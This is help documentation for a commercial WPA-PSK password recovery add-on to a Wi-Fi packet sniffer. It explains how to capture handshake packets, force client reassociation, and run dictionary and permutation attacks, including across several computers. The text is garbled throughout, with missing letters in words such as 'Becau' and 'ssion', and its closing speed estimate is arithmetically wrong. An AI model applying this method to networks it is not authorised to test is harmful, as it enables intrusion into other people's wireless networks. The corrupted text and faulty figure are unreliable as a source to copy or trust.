WPA Key Recovery Help Documentation
Copyright © 2007 TamoSoft
WPA Key Recovery (WPAKR) is an add-on for CommView for WiFi designed to recover WPA passwords for WPA- or WPA2-protected 802.11 a/b/g wireless networks in Pre-Shared Key (PSK) mode. Becau WPA/WPA2 encryption contains no known weakness, the recovery process is bad on trying all passwords loaded from the dictionary file one by one, as well as optional password permutations.
To install WPAKR, simply launch the tup file. WPAKR requires CommView for WiFi 5.6 or later and will be installed to the CommView for WiFi application folder. You can also install WPAKR on a computer without CommView for WiFi if you would like to u WPAKR in offline mode, for processing capture files copied from the computer running CommView for WiFi. If you install WPAKR on a computer without CommView for WiFi, you can launch it by double-clicking the program's executable file located in the folder to which you installed it.
If you'd like to u a distributed recovery process, i.e. u multiple computers simultaneously, you will find the installation instructions in the Splitting the Job Between Multiple Computers chapter.
Once WPAKR has been installed, you can launch it by clicking Tools => WPA Key Recovery in the CommView for WiFi menu, as shown below:
Note that this menu item becomes available only after you've installed WPAKR. When WPAKR is launched, CommView for WiFi establishes a TCP/IP connection with WPAKR so CommView for WiFi can nd captured packets to WPAKR for analysis.
To be able to recover a WPA-PSK key, WPAKR needs to receive packets with Association or Re-association Request followed by EAPOL key exchange packets. The are the packets ud in WPA for negotiating ssion keys. It's important that all of the EAPOL key exchange packets and at least
one Association or Re-association Request packet be successfully captured. A damaged or missing EAPOL packet will make it impossible for WPAKR to start a key recovery process, and capturing the next EAPOL conversation between the AP and station may be required. This is an important distinction in the way WEP and WPA traffic is decrypted.
That said, WPAKR would display a new key recovery ssion only after CommView for WiFi has successfully captured a Association/Re-association Request packet followed by an EAPOL key exchange. This means that you should start capturing traffic from a WLAN in CommView for WiFi and wait for the next EAPOL exchange. EAPOL exchanges take place during the station association that may be triggered by connecting or reconnecting to the WLAN by the client, or restarting the AP, or by using the Node Reassociation tool in CommView for WiFi.
Alternatively, you can u WPAKR as a stand-alone application and import Association/Re-association Request and EAPOL packets previously captured by CommView for WiFi:
Once the necessary packets have been captured or loaded from a capture file, a new key recovery ssion will show up in WPAKR:
The SSID column lists the SSID of the access point. The BSSID column lists the hardware address of the access point. The Password column displays the recovered WPA password, if any. The Status column displays the current application status. Once the password has been recovered, a dialog box will display the password:
The obtained WPA key can be en by clicking Tools => WPA Passwords in the application menu. WPAKR memorizes recovered keys between launches and tries them first, before attempting to recover them.
Note that the evaluation version displays only the first two characters of the recovered password. The rest of the characters are replaced by asterisks. The licend version displays all characters.
The Action menu can be ud for manually controlling the key recovery process.
Recovery Speed, Dictionaries, and Password Permutations
Becau WPA us robust encryption without known weakness, the only way to recover a password is by trying words from a dictionary file one by one. This process is very slow becau each password must be hashed multiple times. A Pentium 4 2.8 GHz computer can try approximately 160 passwords per cond. Becau of such a low speed, a brute-force attack (i.e. trying all possible character combinations) doesn't make n, as the minimum allowed WPA password length is eight characters. Trying all combinations even for a 5-character password will require 90^5 = ~6 billion attempts, or 1,000 days.
